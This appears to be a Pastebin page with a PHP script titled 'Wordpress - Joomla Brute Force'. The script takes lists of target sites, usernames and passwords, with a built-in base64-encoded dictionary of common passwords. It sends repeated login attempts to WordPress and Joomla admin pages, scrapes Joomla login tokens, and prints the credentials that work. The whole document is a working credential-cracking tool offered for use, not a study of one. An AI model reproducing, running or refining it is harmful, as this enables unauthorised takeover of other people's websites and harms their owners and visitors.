Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- set_time_limit(0);
- error_reporting(0);
- function curl($url, $post = "GET", $header = "", $cookie = "", $head = 0)
- {
- set_time_limit(0);
- $curl = ($url);
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_TIMEOUT, 10);
- $agent = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0";
- curl_setopt($ch, CURLOPT_USERAGENT, $agent);
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($ch, CURLOPT_REFERER, $url.'/wp-admin/');
- if (($post != "GET") or strlen($post >10)) {
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- }
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- if ($head == 1)
- curl_setopt($ch, CURLOPT_HEADER, 1);
- if (is_array($header))
- curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
- // if(strlen($cookie) > 5) // get cookie from GetCookies();
- // curl_setopt($ch, CURLOPT_COOKIE, $cookie);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1); //2
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- $result = curl_exec($ch);
- curl_close($ch);
- return $result;
- }
- $error = "/do not match|clave no coinciden|not exist|no existe|lỗi|nicht übereinstimmen|Invalid|error|không đúng|không chính xác|An error has occurred|Internal Server Error/gi";
- function login_wp($data){
- global $error;
- if(preg_match($error,$data)) return false; // 1.5
- else return true;
- }
- function login_joomla($data){
- global $error;
- if(preg_match($error,$data)) return false; // 1.5
- else return true;
- }
- function xflush(){
- echo(str_repeat(' ',256));
- // check that buffer is actually set before flushing
- if (ob_get_length()){
- @ob_flush();
- @flush();
- @ob_end_flush();
- }
- @ob_start();
- }
- function http_code($url){
- $ch = curl_init($url);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch,CURLOPT_TIMEOUT,10);
- curl_setopt($ch,CURLOPT_NOBODY, true);
- $agent = "User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0";
- curl_setopt($ch, CURLOPT_USERAGENT, $agent);
- $output = curl_exec($ch);
- $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- return $httpcode;
- }
- function echojs($data){
- echo '<script type="text/javascript">alert(\''.$data.'\');</script>';
- }
- function write($file,$content){
- if (!$handle = fopen($file, 'w+')) {
- return false;
- die('Cant open file'.$file);
- }
- if (fwrite($handle, $content) === FALSE) {
- return false;
- die('Cant write file'.$file);
- }
- else return true;
- }
- $passDef = "MTIzcGFzcw0KcGFzczEyMw0KYWJjMTIzDQpxd2VydHkNCjAxMjM0NTYNCjAxMjM0NTY3DQowMTIzNDU2NzgNCjAxMjM0NTY3ODkNCjAxMjM0NTY3ODkwDQoxMjM0NTYNCmFkbWluDQoxMjM0NTY3DQoxMjM0NTY3OA0KMTIzNDU2Nzg5DQoxMjM0NTY3ODkwDQoyMjIyMjINCjMzMzMzMw0KNDQ0NDQ0DQo1NTU1NTUNCjY2NjY2Ng0KNzc3Nzc3DQo4ODg4ODgNCjk5OTk5OQ0KMTExMTExDQowMDAwMDANCjEyMzEyMw0KNDU2NDU2DQo3ODk3ODkNCjEyMzMyMQ0KNDU2NjU0DQo2NTQzMjENCjc2NTQzMjENCjg3NjU0MzIxDQo5ODc2NTQzMjENCjA5ODc2NTQzMjENCmFkbWluMTIzDQoxMjNhZG1pbg0KYWRtaW4xMjM0NTYNCjEyMzQ1NmFkbWluDQoxMjM0NTU0MzIxDQoxMjM0NDMyMQ0KYWJjZGVmDQphYmNhYmMNCmlsb3ZleW91";
- ?>
- <html>
- <title>Wordpress + Joomla BF - heroes1412</title>
- <style>
- html, body, #wrap {
- width: 100%;
- margin: 5px;
- padding: 5px;
- background-color: silver;
- }
- #trai {
- width: 400px;
- float: left;
- text-align: center;
- }
- #giua {
- width: 190px;
- float: left;
- text-align: center;
- }
- #phai {
- width: 153px;
- float: left;
- text-align: center;
- }
- #clear {
- clear: both;
- padding-left: 285px;
- }
- #button {
- width: 150px;
- }
- </style>
- <h3>Wordpress - Joomla Brute Force</h3>
- <form action="" method="POST">
- <div id="trai">
- List Site: <textarea name="site" rows="40" cols="47"><?php if(isset($_POST["site"])) echo $_POST["site"]; ?></textarea>
- </div>
- <div id="giua">
- Username: <textarea name="username" rows="40" cols="20"><?php if(isset($_POST["username"])) echo $_POST["username"]; else echo "admin"; ?></textarea>
- </div>
- <div id="phai">
- Password: <textarea name="password" rows="40" cols="20"><?php if(isset($_POST["password"])) echo $_POST["password"]; else echo base64_decode($passDef);?></textarea>
- </div>
- <div id="clear">
- <br /><input id="button" type="submit" name="crack" value="Start"/>
- </div>
- </form>
- </html>
- <?php
- if(isset($_POST["crack"])){
- $cookie = tempnam('Cookie', 'Cookie-');
- $site = trim($_POST["site"]);
- $username = trim($_POST["username"]);
- $password = trim($_POST["password"]);
- $arrSite = array_unique(array_map("trim",explode("\n",$site)));
- $arrUser = array_unique(array_map("trim",explode("\n",$username)));
- $arrPass = array_unique(array_map("trim",explode("\n",$password)));
- // ob_start(); // benchmark
- // $x = microtime(true); // benchmark
- foreach($arrSite as $site){
- if(substr($site,-1) != "/") $site .= "/";
- if(http_code($site."wp-login.php") == "200" || http_code($site."wp-login.php") == "302"){ // wordpress
- foreach($arrUser as $user){
- foreach($arrPass as $pass){
- $post = "log=".$user."&pwd=".$pass."&wp-submit=Log+In&redirect_to=".urlencode($site)."wp-admin%2F&testcookie=1";
- $login = curl($site."wp-login.php",$post,"",$cookie,1);
- if(login_wp($login)) {
- echo $site . " - " . $user.":".$pass."<br>";
- xflush();
- break;
- }
- }
- }
- }
- elseif (http_code($site."administrator/") == "200" || http_code($site."administrator/") == "302" && stristr(curl($site."administrator/"),"joomla")) { //joomla v1.5 v1.7 v2.x v3.x
- //echojs("Start Joomla");
- $getToken = curl($site."administrator/index.php","GET","",$cookie);
- preg_match_all('/hidden" name="(.*)" value=/i',$getToken,$match1);
- preg_match_all('/hidden" name="return" value="(.*)"\/>/i',$getToken,$match2);
- preg_match_all('/hidden" name="(.*)" value="1" \/>/i',$getToken,$match3);
- $token15x = trim($match1[1][2]);
- $token17x1 = trim($match2[1][0]);
- $token17x2 = trim($match3[1][0]);
- if(strlen($token15x) == 32){ // joomla 1.5
- foreach($arrUser as $user){
- foreach($arrPass as $pass){
- $post = "username=".$user."&passwd=".$pass."&lang=&option=com_login&task=login&".$token15x."=1";
- $login = curl($site."administrator/index.php",$post,"",$cookie,1);
- if(login_joomla($login)) {
- echo $site . " - " . $user.":".$pass."<br>";
- xflush();
- break;
- }
- }
- }
- }
- elseif(strlen($token17x2) == 32){ //joomla 1.7 2.x 3.x
- foreach($arrUser as $user){
- foreach($arrPass as $pass){
- $post = "username=".$user."&passwd=".$pass."&lang=&option=com_login&task=login&return=".$token17x1."&".$token17x2."=1";
- $login = curl($site."administrator/index.php",$post,"",$cookie,1);
- if(login_joomla($login)) {
- echo $site . " - " . $user.":".$pass."<br>";
- xflush();
- break;
- }
- }
- }
- }
- }
- }
- // $temp = microtime(true) - $x; //end benchmark
- // ob_end_clean(); //end benchmark
- // echo echojs("It costs: " . round($temp,2) . " seconds.");
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement